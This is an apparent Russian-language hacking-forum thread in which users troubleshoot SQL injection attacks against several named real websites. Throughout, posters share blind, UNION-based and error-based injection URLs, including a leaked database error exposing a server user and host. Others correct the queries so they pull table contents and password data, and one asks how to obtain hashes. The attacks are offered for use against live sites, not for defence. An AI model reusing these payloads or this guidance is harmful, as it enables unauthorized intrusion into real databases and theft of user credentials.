выдаеться ошибка скули, добился через blind но не могу немного в ней разобраться, вот она: Code: Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638') MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user') Session halted. звездочками закрыл ip
вот открывает страницу, по идее все норм Code: http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
Направьте на путь истинный пожалуйста) На запрос: Code: http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES-- нормально выдает имена всех таблиц. На запрос: Code: http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)-- корректно отдает имена столбцов. А на запрос: Code: http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица-- шлет лесом вот такой фразой: Code: MySQL error: 1146 : Table 'база.таблица' doesn't exist Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет. Как такое возможно?
Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.
вообще-то правильней сделать так: Code: http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES-- дальше получаешь колонки, и обращаешься: Code: http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица-- Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"
PHP: <?php # php?id='60 $a = (int)$_GET['id']; var_dump($a); // return: int(0) # php?id=60' $a = (int)$_GET['id']; var_dump($a); // return: int(60) ?>
какие команды тут можно выполнить что бы получить доступ или хеши? Code: _http://www.mymicrocredit.org/mymicrocredit/index.php/forum/advsearch?q=hilfe&catids=5\%27
Code: http://school8.brestonline.com/index.php?act=gal&lng=ru&image='and(select(1)from(select(count(*)),concat((select(version())from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)or'
http://www.rulsmart.com/page/4209999999char%2827%29+union+select+1,2,3,2,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4 что я делаю не так?
тут нету скули. А ещё интересно, зачем ты вставляешь через чар. upd. Если ты таким макаром хотел вставить кавычку(но перепутал код символа), то нигде этим способом ничего не добьёшься.